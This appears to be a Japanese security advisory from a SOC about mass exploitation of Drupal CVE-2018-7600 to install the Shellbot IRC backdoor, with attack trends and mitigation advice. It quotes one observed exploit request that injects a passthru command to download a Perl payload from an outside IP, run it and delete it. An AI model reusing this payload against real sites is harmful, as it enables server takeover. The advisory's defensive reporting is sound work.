検知状況

Drupalの脆弱性(CVE-2018-7600)を悪用したWebサイトへの広範囲な攻撃を観測

記事をシェアする:

IBM Managed Security Services(MSS)のインテリジェンス・アナリストは、攻撃者がDrupalの脆弱性を悪用して多数のWebサイトに対して攻撃を行い、バックドア(Shellbot)の設置を試みていることを確認しました。[1]

 

WordPress同様、DrupalはWebサイトの作成や管理を行う人に広く利用されているオープンソースのコンテント・マネジメント・システム(CMS)のひとつです。

CMSは非常に多くのWebサイトで利用されており、攻撃者にとっても格好の標的となっています。攻撃者はCMSの脆弱性を悪用する自動化されたツールを作成することで、Webサイトに対してランダムに攻撃を行い、脆弱なCMSを利用している多数のWebサイトを乗っ取り、改ざんすることが可能です。

最近の調査により、不審なHTTP POSTリクエストを繰り返し送信している不審なIPアドレス(31[.]204[.]80[.]133)を確認しました。

以下はそのPOSTリクエストの内容です。

/?q=user/password&name[#type]=markup&name[#markup]=cd /tmp;wget 64[.]15[.]78[.]216/lip;perl;
cd /tmp;curl -O 64[.]15[.]78[.]216/lip;perl lip;rm -rf lip*&name[#post_render][]=passthru

さらに調査を行ったところ、これらのリクエストの内容と同様の特徴をもつ通信を行っている送信元が多数存在することが判明しました。このような特徴を持つ通信は2018年8月12日ごろより確認されており、10月23日まで継続していました。

不審なHTTP POSTリクエストの検知数推移

(Tokyo SOC調べ 2018年8月1日~2018年10月31日)

 

これらの送信元は、脆弱性のあるWebサイトを調査するため、Drupalの脆弱性(CVE-2018-7600、別名「Drupalgeddon 2.0」)を利用しており、脆弱性が存在する場合、最終的にShellbotを利用してバックドアの設置を行っています。また、調査行為においては、別の脆弱性(CVE-2018-7602)もあわせて利用しています。

これら2つのDrupalの脆弱性は既に修正されたパッチがリリースされています。

 

攻撃に成功した場合に設置されるShellbotは、IRCでC&Cサーバーと通信を行います。また、多数のツールが組み込まれており、DDoS攻撃を行ったり、SQLインジェクションやその他の脆弱性を調査したり、ユーザー権限の昇格を行ったりすることが可能となっています。

 

Shellbot自体は古くから存在するもので、2005年頃より攻撃者に利用されています。

現在でも引き続きいくつかの攻撃グループが利用しており、最近では2017年にApache Strutsの脆弱性(CVE-2017-5638)を悪用してShellbotを実行し、仮想通貨採掘を行っていたことが確認されています。

 

同様の攻撃の被害にあわないために以下のような対策を行うことを推奨します。

 

  • CMSを利用している場合、最新のバージョンを利用する
  • CMSのプラグインや拡張機能の見直しや最新化
  • CMSの管理画面等へのアクセス制御
  • パスワードに推測困難な文字列を利用する
  • IPSやWAF等のセキュリティ機器で検知・防御が可能となっているか確認する

 

本攻撃キャンペーンの詳細やIoC情報はX-Force Exchange[2]を参照してください。

 

【参考情報】

[1] Threat Actors Prey on Drupalgeddon Vulnerability to Mass-Compromise Websites and Underlying Servers

https://securityintelligence.com/threat-actors-prey-on-drupalgeddon-vulnerability-to-mass-compromise-websites-and-underlying-servers/

 

[2] Backdoor.Shellbot Exploiting CVE-2018-7600

https://exchange.xforce.ibmcloud.com/collection/BackdoorShellbot-Exploiting-CVE-2018-7600-e32a761d1df0abbd396ed92a16b5e9f7

 

More 検知状況 stories

マルウェア「Ursnif」への感染を狙う不正な日本語メールの検知状況

Tokyo SOCでは、10月後半より件名や本文に日本語を使用した不正メールのばらまきを検知しています。メール […]

さらに読む

Apache Struts2の脆弱性(S2-057/CVE-2018-11776)を狙う攻撃の動向について

2018年8月22日にApache Struts2の脆弱性(S2-057/CVE-2018-11776)が公開 […]

さらに読む

2017年下半期 Tokyo SOC 情報分析レポート 公開

「2017年下半期 Tokyo SOC 情報分析レポート」を公開しました。 本レポートは、IBMが全世界8拠点 […]

さらに読む